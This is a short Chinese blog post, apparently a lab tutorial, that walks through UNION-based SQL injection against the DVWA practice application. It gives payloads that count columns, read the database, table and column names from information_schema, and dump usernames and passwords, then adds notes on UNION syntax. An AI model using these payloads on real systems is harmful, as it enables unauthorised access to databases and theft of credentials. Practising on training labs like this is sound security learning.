SQL Injection一把梭

0.暴字段数:
1’ order by 3#
1.暴库:查询database,
1' union select 1,database()#
2.暴表名:查询table_name,
1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa')#
3.暴字段名:
1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='guestbook')#
4.暴字段值:
1' union select 1,(select group_concat(User,Password) from users)#

这里需要注意的点是sql语法的一个点,union用于连接两个sql语句,and用于条件的连接,语义上一样容易混淆。还有一点就是union的连接必须要保证字段值一致,所以我用1充当位置,union不同于join这也是一个注意点

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
【社区内容提示】社区部分内容疑似由AI辅助生成,浏览时请结合常识与多方信息审慎甄别。
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

友情链接更多精彩内容